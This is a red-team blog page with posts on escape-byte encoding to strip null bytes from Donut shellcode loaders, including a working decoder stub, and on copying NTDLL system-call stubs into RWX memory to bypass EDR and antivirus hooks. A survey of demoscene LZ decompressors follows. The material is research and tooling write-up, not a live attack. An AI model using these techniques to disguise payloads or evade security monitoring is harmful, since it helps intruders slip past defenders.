Shellcode: Encoding Null Bytes Faster With Escape Sequences

Introduction

Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. It’s also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe “escape codes” is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

XOR Cipher

Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. It’s also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what I’d probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24-Bits.

int find_xor_key(
  const void *inbuf, u32 inlen, 
  void *outbuf, int outlen) 
{
    int i, j, keylen=1;
    u8  *in = (u8*)inbuf, *key=(u8*)outbuf;
    
    // initialize key
    for(i=0; i<outlen; i++) {
      key[i] = (i < keylen) ? 0 : -1;
    }
    
    // while keylen is less than max key requested
    while(keylen < outlen) {
      // xor data with current key
      for(i=0; i<inlen; i++) {
        // if the result of xor is zero. end loop
        if((in[i] ^ key[i % keylen]) == 0) break;
      }
      // if we processed all data successfully
      if(i == inlen) {
        // return current key and its length
        return keylen;
      }
      // otherwise, update the key
      for(i=0; ; i++) {
        if(++key[i]) break;
      }
      // update the key length
      if(i == keylen) keylen++;
    }
    // return nothing found
    return 0;
}

The following function can be used to test it and works relatively fast for something that’s compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

void test_key(void) {
    int i, keylen;
    u8  key[8], data[1024];
    
    srand(time(0));
    
    // fill buffer with pseudo-random bytes
    for(i=0; i<sizeof(data); i++) {
      data[i] = rand();
    }
    // try find a suitable XOR key for the data
    keylen = find_xor_key(data, sizeof(data), key, sizeof(key));
    
    printf("Suitable key %sfound.\n\n", 
      keylen ? "" : "could not be ");
    
    if(keylen) {
      printf("Key length : %i\nKey        : ", keylen);
      while(keylen--) {
        printf("%02x ", key[keylen]);
      }
      putchar('\n');
    }
}

find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isn’t finding a key. We’re not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.

Encoding Algorithm

Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. I’m not sure if I’m using the correct terminology for what I describe next, but hopefully you’ll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

  1. Read a byte from the input file or stream and assign to X.
  2. Assign X plus 1 to Y.
  3. If Y is not 0 or 1, goto step 6.
  4. Save the escape sequence 0x01 to the output file or stream.
  5. XOR X with predefined 8-Bit key K, goto step 7.
  6. Add 1 to X.
  7. Save X to the output file or stream.
  8. Repeat step 1-7 until EOF.

Although I use an XOR cipher in step 5, it could be replaced with something else.

static
void nullz_encode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // adding one is just an example
      t = c + 1;
      // is the result 0(avoid) or 1(escape)?
      if(t == 0 || t == 1) {
        // write escape sequence
        putc(0x01, out);
        // The XOR is an optional step.
        // Avoid using 0x00 or 0xFF with XOR!
        putc(c ^ NULLZ_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

Decoding Algorithm

  1. Read a byte from the input file or stream and assign to X.
  2. If X is not an escape sequence 0x01, goto step 5.
  3. Read a byte from the input file or stream and assign to X.
  4. XOR X with predefined 8-Bit key K used for encoding, goto step 6.
  5. Subtract 1 from X.
  6. Save X to the output file or stream.
  7. Repeat steps 1-6 until EOF.
static
void nullz_decode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape sequence
      if(c == 0x01) {
        // read next byte and XOR it
        c = getc(in);
        // The XOR is an optional step.
        putc(c ^ NULLZ_KEY, out);
      } else {
        // else subtract byte
        putc(c - 1, out);
      }
    }
}

x86/AMD64 assembly

This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

    bits   32
    
    %define NULLZ_KEY 0x4D
    
nullz_decode:
_nullz_decode:
    jmp    init_code
load_code:
    pop    esi
    lodsd                    ; load original length of data
    xor    eax, 0x12345678   ; change to 32-bit key    
    xchg   eax, ecx
    push   esi               ; save pointer to code on stack
    pop    edi               ; 
    push   esi
decode_main:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; read next byte
    xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
save_byte:
    stosb                    ; save in buffer
    loop   decode_main
    ret                      ; execute shellcode
init_code:
    call   load_code
    ; XOR encoded shellcode goes here..

Building the Loader

  1. Allocate memory to hold the decoder, 32-bits for the original length of input file and file data itself.
  2. Copy the decoder to memory.
  3. Set the key in decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
  4. Set the original length, encrypted with XOR, right after the decoder.
  5. Set input file data right after the original length.
  6. Save memory to file.

An option to update the XOR key is left up to you.

// compatible with x86 and x86-64
char NULLZ_DECODER[] = {
  /* 0000 */ "\xeb\x17"             /* jmp   0x19            */
  /* 0002 */ "\x5e"                 /* pop   esi             */
  /* 0003 */ "\xad"                 /* lodsd                 */
#define NULLZ_LEN 5
  /* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
  /* 0009 */ "\x91"                 /* xchg  eax, ecx        */
  /* 000A */ "\x56"                 /* push  esi             */
  /* 000B */ "\x5f"                 /* pop   edi             */
  /* 000C */ "\x56"                 /* push  esi             */
  /* 000D */ "\xac"                 /* lodsb                 */
  /* 000E */ "\xfe\xc8"             /* dec   al              */
  /* 0010 */ "\x75\x03"             /* jne   0x15            */
  /* 0012 */ "\xac"                 /* lodsb                 */
  /* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
  /* 0015 */ "\xaa"                 /* stosb                 */
  /* 0016 */ "\xe2\xf5"             /* loop  0xd             */
  /* 0018 */ "\xc3"                 /* ret                   */
  /* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
};

Summary

Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.

Posted in assembly, donut, security, shellcode, windows | Tagged , , | Leave a comment

Invoking System Calls and Windows Debugger Engine


Introduction

Quick post about Windows System calls that I forgot about working on after the release of Dumpert by Cn33liz last year, which is described in this post. Typically, EDR and AV set hooks on Win32 API or NT wrapper functions to detect and mitigate against malicious activity. Dumpert attempts to bypass any user-level hooks by invoking system calls directly. It first queries the operating system version via RtlGetVersion and then selects the applicable code stubs to execute. SysWhispers generates header/ASM files by extracting the system call numbers from the code stubs in NTDLL.dll and evilsocket also demonstrated how to do this many years ago. @FuzzySec and @TheWover have also implemented dynamic invocation of system calls after remapping NTDLL in Sharpsploit, which you can read about in their Bluehat presentation.

Using system calls on Windows to interact with the kernel has always been problematic because the numbers assigned for each kernel function change between the versions released. Just after Cn33liz published Dumpert, I thought of how invocation might be improved without using assembly and there are lots of ways, but consider at least three for now. The first method, which is probably the simplest and safest, maps NTDLL.dll into executable memory and resolves the address of any system call via the Export Address Table (EAT) before executing. This is relatively simple to implement. The second approach maps NTDLL.dll into read-only memory and uses a disassembler, or at the very least, a length disassembler to extract the system call number. The third will also map NTDLL.dll into read-only memory, copy the code stub to an executable buffer before invoking. The length of the stub is read from the exception directory. Overcomplicated, perhaps, and I did consider a few disassembly libraries for the second method, but just to save time settled with the Windows Debugger Engine, which has a built-in disassembler already.

A PoC to inject a DLL into remote process can be found here. It doesn’t use a disassembler, but because it uses the exception directory to locate the end of a system call, it will only work with 64-bit processes.

Windows Debugging Engine

Disassembling code via the engine requires a live process. Thankfully it’s possible to attach the debugger to the local process in noninvasive mode. You can just map NTDLL into executable memory and invoke any system call from there, however, I wanted an excuse to use the debugging engine. 😛 lde.c, lde.h

LDE::LDE() {
    CHAR path[MAX_PATH];
    
    ctrl = NULL;
    clnt = NULL;
    // create a debugging client
    hr = DebugCreate(__uuidof(IDebugClient), (void**)&clnt);
    if(hr == S_OK) {
      // get the control interface
      hr = clnt->QueryInterface(__uuidof(IDebugControl3), (void**)&ctrl);
      if(hr == S_OK) {
        // attach to existing process
        hr = clnt->AttachProcess(NULL, 
          GetProcessId(GetCurrentProcess()), 
          DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND);
        if(hr == S_OK) {
          hr = ctrl->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);
        }
      }
    }
    ExpandEnvironmentStrings("%SystemRoot%\\system32\\NTDLL.dll", path, MAX_PATH);
    // open file
    file = CreateFile(path, 
      GENERIC_READ, FILE_SHARE_READ, NULL, 
      OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
      
    if(file == INVALID_HANDLE_VALUE) return;
    
    // map file
    map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
    if(map == NULL) return;
    
    // create read only view of map
    mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, NULL);
}

WinDbg has a command to disassemble a complete function called uf (Unassemble Function). Internally, WinDbg builds a Control-flow Graph (CFG) to map the full function before displaying the disassembly of each code block. You can execute a command like uf via the Execute method and so long as you’ve setup IDebugOutputCallbacks, you can capture the disassembly that way. I considered using a CFG to implement something similar to uf, which you can if you wish. The system calls on my own build of Windows 10 have at the most, one branch, so I scrapped the idea of using a CFG or executing uf. With NTDLL mapped, you can use something like the following to resolve the address of an exported API.

FARPROC LDE::GetProcAddress(LPCSTR lpProcName) {
    PIMAGE_DATA_DIRECTORY   dir;
    PIMAGE_EXPORT_DIRECTORY exp;
    DWORD                   rva, ofs, cnt;
    PCHAR                   str;
    PDWORD                  adr, sym;
    PWORD                   ord;
    
    if(mem == NULL || lpProcName == NULL) return NULL;
    
    // get pointer to image directories for NTDLL
    dir = Dirs();
    
    // no exports? exit
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if(rva == 0) return NULL;
    
    ofs = rva2ofs(rva);
    if(ofs == -1) return NULL;
    
    // no exported symbols? exit
    exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + mem);
    cnt = exp->NumberOfNames;
    if(cnt == 0) return NULL;
    
    // read the array containing address of api names
    ofs = rva2ofs(exp->AddressOfNames);        
    if(ofs == -1) return NULL;
    sym = (PDWORD)(ofs + mem);

    // read the array containing address of api
    ofs = rva2ofs(exp->AddressOfFunctions);        
    if(ofs == -1) return NULL;
    adr = (PDWORD)(ofs + mem);
    
    // read the array containing list of ordinals
    ofs = rva2ofs(exp->AddressOfNameOrdinals);
    if(ofs == -1) return NULL;
    ord = (PWORD)(ofs + mem);
    
    // scan symbol array for api string
    do {
      str = (PCHAR)(rva2ofs(sym[cnt - 1]) + mem);
      // found it?
      if(lstrcmp(str, lpProcName) == 0) {
        // return the address
        return (FARPROC)(rva2ofs(adr[ord[cnt - 1]]) + mem);
      }
    } while (--cnt);
    return NULL;
}

The following will use the Disassemble method to show the code. You can also use it to inspect bytes if you wanted to extract the system call number. The beginning and end of the system call is read from the Exception directory.

bool LDE::DisassembleSyscall(LPCSTR lpSyscallName) {
    ULONG64                       ofs, start=0, end=0, addr;
    PIMAGE_DOS_HEADER             dos;
    PIMAGE_NT_HEADERS             nt;
    PIMAGE_DATA_DIRECTORY         dir;
    PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
    DWORD                         i, rva;
    CHAR                          buf[LDE_MAX_STR];
    HRESULT                       hr;
    ULONG                         len;
    
    // resolve address of function in NTDLL
    addr = (ULONG64)GetProcAddress(lpSyscallName);
    if(addr == NULL) return false;
    
    // get pointer to image directories
    dir = Dirs();
    
    // no exception directory? exit
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    if(rva == 0) return false;
    
    ofs = rva2ofs(rva);
    if(ofs == -1) return false;
    
    rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);

    // for each runtime function (there might be a better way??)
    for(i=0; rf[i].BeginAddress != 0; i++) {
      // is it our system call?
      start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
      if(start == addr) {
        // save end and exit search
        end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
        break;
      }
    }
    
    if(start != 0 && end != 0) {
      while(start < end) {
        hr = ctrl->Disassemble(
          start, 0, buf, LDE_MAX_STR, &len, &start);
          
        if(hr != S_OK) break;
        
        printf("%s", buf);
      }
    }
    return true;
}

The following code will disassemble the system call.

int main(int argc, char *argv[]) {
    LDE *lde;
    
    if(argc != 2) {
      printf("usage: dis <system call name>\n");
      return 0;
    }
    
    // create length disassembly engine
    lde = new LDE();
      
    lde->DisassembleSyscall(argv[1]);

    delete lde;
    
    return 0;
}

Just to illustrate disassembly of NtCreateThreadEx and NtWriteVirtualMemory. The address of SharedUserData doesn’t change and therefore doesn’t require fixups to the code just because it’s been mapped somewhere else.

Invoking

Simply copy the code for the system call to memory allocated by VirtualAlloc with PAGE_EXECUTE_READWRITE permissions. Rewriting the above code, we have something like the following.

LPVOID LDE::GetSyscallStub(LPCSTR lpSyscallName) {
    ULONG64                       ofs, start=0, end=0, addr;
    PIMAGE_DOS_HEADER             dos;
    PIMAGE_NT_HEADERS             nt;
    PIMAGE_DATA_DIRECTORY         dir;
    PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
    DWORD                         i, rva;
    SIZE_T                        len;
    LPVOID                        cs = NULL;
    
    // resolve address of function in NTDLL
    addr = (ULONG64)GetProcAddress(lpSyscallName);
    if(addr == NULL) return NULL;
    
    // get pointer to image directories
    dir = Dirs();
    
    // no exception directory? exit
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    if(rva == 0) return NULL;
    
    ofs = rva2ofs(rva);
    if(ofs == -1) return NULL;
    
    rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);

    // for each runtime function (there might be a better way??)
    for(i=0; rf[i].BeginAddress != 0; i++) {
      // is it our system call?
      start = rva2ofs(rf[i].BeginAddress) + (ULONG64)mem;
      if(start == addr) {
        // save the end and calculate length
        end = rva2ofs(rf[i].EndAddress) + (ULONG64)mem;
        len = (SIZE_T) (end - start);
        
        // allocate RWX memory
        cs = VirtualAlloc(NULL, len,  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if(cs != NULL) {
          // copy stub to memory
          CopyMemory(cs, (const void*)start, len);
        }
        break;
      }
    }
    // return pointer to code stub
    return cs;
}

Summary

Invoking system calls via remapping of the NTDLL.dll is of course the simplest approach. A lightweight LDE and CFG with no dependencies on external libraries would be useful for other Red Teaming activities like hooking API or even detecting hooked functions. It could also be used for locating GetProcAddress without touching the Export Address Table (EAT) or Import Address Table (IAT). However, GetSyscallStub demonstrates that you don’t need a disassembler just to read the code stub.

Posted in assembly, programming, redteam, security, windows | Tagged , , , , , | 1 Comment

Shellcode: Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

Contents

  1. Introduction
  2. History
  3. Entropy Coding
  4. Universal code
  5. Lempel-Ziv (LZ77/LZ1)
  6. Lempel-Ziv-Storer-Szymanski (LZSS)
  7. Lempel-Ziv-Bell (LZB)
  8. Intel 8088 / 8086
    1. LZE
    2. LZ4
    3. LZSA
    4. aPLib
  9. MOS Technology 6502
    1. Exomizer
    2. Pucrunch
  10. Zilog 80
    1. Mega LZ
    2. ZX7
    3. ZX7 Mini
    4. LZF
  11. Motorola 68000
    1. PackFire
    2. Shrinkler
  12. C/x86 ASM
    1. Lempel-Ziv Ross Williams (LZRW)
    2. Ultra-fast LZ (ULZ)
    3. BriefLZ
    4. Not Really Vanished (NRV)
    5. Lempel–Ziv–Markov Algorithm (LZMA)
    6. Lempel–Ziv–Oberhumer-Markov Algorithm (LZOMA)
    7. KKrunchy
  13. Results
  14. Summary
  15. Acknowledgements
  16. Further Research
    1. Documentaries and Interviews
    2. Websites, Blogs and Forums
    3. Demoscene Productions
    4. Tools
    5. Other Compression Algorithms

1. Introduction

My last post about compression inadvertently missed algorithms used by the Demoscene that I attempt to correct here. Except for research by Introspec about various 8-Bit algorithms on the ZX Spectrum, it’s tricky to find information in one location about compression used in Demoscene productions. The focus here will be on variations of the Lempel-Ziv (LZ) scheme published in 1977 that are suitable for resource-constrained environments such as 8, 16, and 32-bit home computers released in the 1980s. In executable compression, we can consider LZ an umbrella term for LZ77, LZSS, LZB, LZH, LZARI, and any other algorithms inspired by those designs.

Many variations of LZ surfaced in the past thirty years, and a detailed description of them all would be quite useful for historical reference. However, the priority for this post is exploring algorithms with the best ratios that also use the least amount of code possible for decompression. Considerations include an open-source compressor and the speed of compression and decompression. However, some decoders without sources for a compressor are also useful to show the conversion between architectures.

Drop me an email, if you would like to provide feedback on this post. x86 assembly codes for some of algorithms discussed here may be found here.

2. History

Designing a compression format requires trade-offs, such as compression ratio, compression speed, decompression speed, code complexity, code size, memory usage, etc. For executable compression in particular, where the sum of decompression code size and compressed size is what counts, the optimal balance between these two depends on the intended target size.Aske Simon Christensen, author of Shrinkler and co-author of Crinkler.

Since the invention of telegraphy, telephony, and especially television, engineers have researched many ways to reduce the bandwidth required for transmitting electrical signals. And before the invention of analog-to-digital converters and entropy coding methods in the 1950s, compaction of television signals required reducing the quality of the video before transmission, a technique that’s referred to as lossy compression. Many publications on compressing television signals surfaced between the 1950s-1970s, and these eventually proved to be useful in other applications, most notably for the aerospace industry.

For example, various interplanetary spacecraft launched in the 1960s could record data faster than what they could transmit to earth. And following a review of unclassified space missions in the early 1960s, in particular, the Mariner Mars mission of 1964, NASA’s Jet Propulsion Laboratory examined various compression methods for acquiring images in space. The first unclassified spacecraft to use image compression was Explorer 34 or Interplanetary Monitoring Platform 4 (IMP-4) launched in 1967. It used Chroma subsampling, invented in the 1950s specifically for color television. This method, which eventually became part of the JPEG standard, would continue being used by NASA until the invention of a more optimal encoding method called Discrete Cosine Transform (DCT)

The increase of computer mainframes in the 1950s and the collection of data on citizens for social science motivated prior research and development of lossless compression techniques. Microprocessors became inexpensive in the late 1970s, leading the way for average consumers to purchase a computer of their own. However, this didn’t immediately reduce the cost of disk storage. And the vast majority of user data remained stored on magnetic tapes or floppy diskettes rather than hard disk drives offered only as an optional component.

Hard disk drives remained expensive between 1980-2000, encouraging the development of tools to reduce the size of files. The first program to compress executables on the PC was Realia Spacemaker, which was written by Robert Dewar and published in 1982. The precise algorithm used by this program remains undocumented. However, the year of publication would suggest it uses Run-length encoding (RLE). Qkumba informed me about two things via email. First, games for the Apple II used RLE in the early 1980s for shrinking images used as title screens. Examples include Beach-Head, G.I. Joe and Black Magic, to name a few. Second, games by Infocom used Huffman-like text compression. Microsoft EXEPACK by Reuben Borman and published in 1985 also used RLE for compression.

Haruhiko Okumura uploaded an implementation of the LZSS compression algorithm to a Bulletin Board System (BBS) in 1988. Inspired by Okumura, Fabrice Bellard published LZEXE in 1989, which appears to be the first executable compressor to use LZSS.

3. Entropy Coding

Samuel Morse published his coding system for the electrical telegraph in 1838. It assigned short symbols for the most common letters of an alphabet, and this may be the first example of compression used for electrical signals. An entropy coder works similarly. It removes redundancy by assigning short codewords for symbols occurring more frequently and longer codewords for symbols with the least occurrence. The following table lists some examples.

Type Publication and Author
Shannon A Mathematical Theory of Communication published in 1948 by Claude E. Shannon.
Huffman A Method for the Construction of Minimum Redundancy Codes published in 1952 by David A. Huffman.
Arithmetic Generalized Kraft Inequality and Arithmetic Coding published in 1976 by Jorma Rissanen.
Range There are two papers of interest here. One is Source Coding Algorithms for Fast Data Compression published in 1976 by Richard Clark Pasco. The other is Range encoding: An Algorithm for Removing Redundancy from a Digitised Message published in 1979 by G.N.N. Martin.
ANS Asymmetric Numeral Systems: Entropy Coding Combining Speed of Huffman Coding with Compression Rate of Arithmetic Coding published in 2014 by Jarosław Duda.

Arithmetic or range coders fused with an LZ77-style compressor result in high compression ratios and compact decompressors, which makes them attractive to the demo-scene. They are slower than a Huffman coder, but much more efficient. ANS is the favored coder used in mission-critical systems today, providing efficiency and speed.

4. Universal Code

There are many variable-length coding methods used for integers of arbitrary upper bound, and most of the algorithms presented in this post use Elias gamma coding for the offset and length of a match reference. The following table contains a list of papers referenced in Punctured Elias Codes for variable-length coding of the integers published by Peter Fenwick in 1996.

Coding Author and publication
Golomb Run-length encodings published in 1966 by Solomon W. Golomb.
Levenshtein On the redundancy and delay of separable codes for the natural numbers. published in 1968 by Vladimir I. Levenshtein.
Elias Universal Codeword Sets and Representations of the Integers published in 1975 by Peter Elias.
Rodeh-Even Economical Encoding of Commas Between Strings published in 1978 by Michael Rodeh and Shimon Even.
Rice Some Practical Universal Noiseless Coding Techniques published in 1979 by Robert F. Rice.

5. Lempel-Ziv (LZ77/LZ1)

Designed by Abraham Lempel and Jacob Ziv and described in A Universal Algorithm for Sequential Data Compression published in 1977. It compresses files by searching for the repetition of strings or sequences of bytes and storing a reference pointer and length to an earlier occurrence. The size of a reference pointer and length will define the overall speed of the compression and compression ratio. The following decoder uses a 12-Bit reference pointer (4096 bytes) and 4-Bit length (16 bytes). It will work with a a compressor written by Andy Herbert. However, you must change the compressor to use 16-bits for a match reference. Charles Bloom discusses small LZ decoders in a blog post that may be of interest to readers.

uint32_t lz77_depack(
  void *outbuf, 
  uint32_t outlen, 
  const void *inbuf) 
{
    uint32_t ofs, len;
    uint8_t  *in, *out, *end, *ptr;
    
    in  = (uint8_t*)inbuf;
    out = (uint8_t*)outbuf;
    end = out + outlen;
    
    while(out < end) {
      len = *(uint16_t*)in;
      in += 2;
      ofs = len >> 4; 
      
      // offset?
      if(ofs) {
        // copy reference
        len = (len & 15) + 1;
        ptr = out - ofs;
        while(len--) *out++ = *ptr++;
      }
      // copy literal
      *out++ = *in++;
    }
    // return depacked length
    return (out - (uint8_t*)outbuf);
}

The assembly is optimized for size, currently at 54 bytes.

lz77_depack:
_lz77_depack:
    pushad
    
    lea    esi, [esp+32+4]
    lodsd
    xchg   edi, eax           ; edi = outbuf
    lodsd
    lea    ebx, [eax+edi]     ; ebx = outlen + outbuf
    lodsd
    xchg   esi, eax           ; esi = inbuf
    xor    eax, eax
lz77_main:
    cmp    edi, ebx           ; while (out < end)
    jnb    lz77_exit
    
    lodsw                     ; ofs = *(uint16_t*)in;
    movzx  ecx, al            ; len = ofs & 15;
    shr    eax, 4             ; ofs >>= 4;
    jz     lz77_copybyte
    
    and    ecx, 15
    inc    ecx                ; len++;
    push   esi
    mov    esi, edi           ; ptr = out - ofs;
    sub    esi, eax           
    rep    movsb              ; while(len--) *out++ = *ptr++;
    pop    esi
lz77_copybyte:
    movsb                     ; *out++ = *src++;
    jmp    lz77_main
lz77_exit:
    ; return (out - (uint8_t*)outbuf);
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret
    

6. Lempel-Ziv-Storer-Szymanski (LZSS)

Designed by James Storer, Thomas Szymanski, and described in Data Compression via Textual Substitution published in 1982. The match reference in the LZ77 decoder occupies 16-bits or two bytes even when no match exists. That means for every literal are two additional redundant bytes, which isn’t very efficient. LZSS improves the LZ77 format by using one bit to distinguish between a match reference and a literal, and this improves the overall compression ratio. Introspec informed me via email the importance of this paper in describing the many variations of the original LZ77 scheme. Many of which remain unexplored. It also has an overview of the early literature, which is worth examining in more detail. Haruhiko Okumura shared his implementations of LZSS via a BBS in 1988, and this inspired the development of various executable compressors released in the late 1980s and 1990s. The following decoder works with a compressor by Sebastian Steinhauer.

// to keep track of flags
typedef struct _lzss_ctx_t {
    uint8_t w;
    uint8_t *in;
} lzss_ctx;

// read a bit
uint8_t get_bit(lzss_ctx *c) {
    uint8_t x;
    
    x = c->w;
    c->w <<= 1;
    
    if(c->w == 0) {
      x = *c->in++;
      c->w = (x << 1) | 1;
    }
    return x >> 7;
}

uint32_t lzss_depack(
  void *outbuf, 
  uint32_t outlen, 
  const void *inbuf) 
{
    uint8_t  *out, *end, *ptr;
    uint32_t i, ofs, len;
    lzss_ctx c;
    
    // initialize pointers
    out = (uint8_t*)outbuf;
    end = out + outlen;
    
    // initialize context
    c.in = (uint8_t*)inbuf;
    c.w  = 128;
    
    while(out < end) {
      // if bit is not set
      if(!get_bit(&c)) {
        // store literal
        *out++ = *c.in++;
      } else {
        // decode offset and length
        ofs = *(uint16_t*)c.in;
        c.in += 2;
        len = (ofs & 15) + 3;
        ofs >>= 4;
        ptr = out - ofs - 1;
        // copy bytes
        while(len--) *out++ = *ptr++;
      }
    }
    // return length
    return (out - (uint8_t*)outbuf);
}

The assembly is a straight forward translation of the C code, currently at 69 bytes.

lzss_depackx:
_lzss_depackx:
    pushad
    
    lea    esi, [esp+32+4]
    lodsd
    xchg   edi, eax          ; edi = outbuf
    lodsd
    lea    ebx, [edi+eax]    ; ebx = edi + outlen
    lodsd
    xchg   esi, eax          ; esi = inbuf
    mov    al, 128           ; set flags
lzss_main:
    cmp    edi, ebx          ; while(out < end)
    jnb    lzss_exit
    
    add    al, al            ; c->w <<= 1
    jnz    lzss_check_bit
    
    lodsb                    ; c->w = *c->in++;
    adc    al, al
lzss_check_bit:
    jc     read_pair         ; if bit set, read len,offset
    
    movsb                    ; *out++ = *c.in++;
    jmp    lzss_main
read_pair:
    movzx  edx, word[esi]    ; ofs = *(uint16_t*)c.in;
    add    esi, 2            ; c.in += 2;
    mov    ecx, edx          ; len = (ofs % LEN_SIZE) + LEN_MIN;
    and    ecx, 15           ;
    add    ecx, 3            ;
    shr    edx, 4            ; ofs >>= 4
    push   esi
    lea    esi, [edi-1]      ; ptr = out - ofs - 1;
    sub    esi, edx          ;
    rep    movsb             ; while(len--) *out++ = *ptr++;
    pop    esi
    jmp    lzss_main
lzss_exit:
    ; return (out - (uint8_t*)outbuf);
    sub    edi, [esp+32+4]
    mov    [esp+28], edi
    popad
    ret

7. Lempel-Ziv-Bell (LZB)

Designed by Tim Bell and described in his 1986 Ph.D. dissertation A Unifying Theory and Improvements for Existing Approaches to Text Compression. It uses a pre-processor based on LZSS and Elias gamma coding of the match length, which results in a compression ratio similar to LZH and LZARI by Okumura. However, it does not suffer the performance penalty of using Huffman or arithmetic coding. Introspec considers it to be the first implementation that uses variable-length coding for reference matches, which is the basis for most modern LZ77-style compressors.

A key exhibit in a $300 million lawsuit brought by Stac Electronics (SE) against Microsoft was Bell’s thesis. The 1993 case centered around a disk compression utility included with MS-DOS 6.0 called DoubleSpace. SE accused Microsoft of patent violations by using the same compression technologies used in its Stacker product. The courts agreed, and SE received $120 million in compensatory damages.

8. Intel 8088 / 8086

For many years, bigger nerds than myself would remind me of what a mediocre architecture the x86 is and that it didn’t deserve to be the most popular CPU for personal computers. But if it’s so bad, how did it become the predominant architecture? It probably commenced in the 1970s with the release of the 8080, and an operating system designed for it by Gary Kildall called Control Program Monitor or Control Program for Microcomputers (CP/M).

Year Model Data Width (bits) Address Width (bits)
1971 4004 4 12
1972 8008 8 14
1974 4040 4 12
1974 8080 8 16
1976 8085 8 16
1978 8086 16 20
1979 8088 8 20

Kildall initially designed and developed CP/M for the 8-Bit 8080 and licensed it to run devices such as the IMSAI 8080 (seen in the movie Wargames). Kildall was motivated by the enormous potential for microcomputers to become regular home appliances. And when IBM wanted to build a microcomputer of its own in 1980, CP/M was the most successful operating system on the market.

IBM made two decisions: use the existing software and hardware for the 8085-based IBM System/23 by using the 8088 instead of the 8086. (the cost per CPU unit was also a factor); and use its product to run CP/M to remain competitive with other microcomputers on the market.

Regrettably, Kildall missed a unique opportunity to supply CP/M for the IBM Personal Computer. Instead, Bill Gates / Microsoft obtained licensing to use a cloned version of CP/M called the Quick and Dirty Operating System (QDOS). QDOS was later rebranded to 86-DOS, before being shipped with the first IBM PC as “IBM PC DOS”. Microsoft later purchased 86-DOS, rebranded it Microsoft Disk Operating System (MS-DOS), and forced IBM into a licensing agreement so Microsoft were free to sell MS-DOS to other companies. Kildall would later remark in his unpublished memoir Computer Connections, People, Places, and Events in the Evolution of the Personal Computer Industry. that “Gates is more an opportunist than a technical type and severely opinionated even when the opinion he holds is absurd.”

8.1 LZE

Designed by Fabrice Bellard in 1989 and included in the closed-source MS-DOS packer LZEXE by the same. Inspired by LZSS but provides a higher compression ratio. Hiroaki Goto reverse engineered this in 1995 and published an open-source implementation in 2008. The following is a 32-Bit translation of the 16-Bit decoder with some additional optimizations. There’s also a 68K version for anyone interested and a Z80 version by Kei Moroboshi published in 2017.

lze_depack:
_lze_depack:
    pushad
    mov    edi, [esp+32+4] ; edi = out
    mov    esi, [esp+32+8] ; esi = in
    
    call   init_get_bit
lze_get_bit:  
    add    dl, dl            ; 
    jnz    exit_get_bit
    
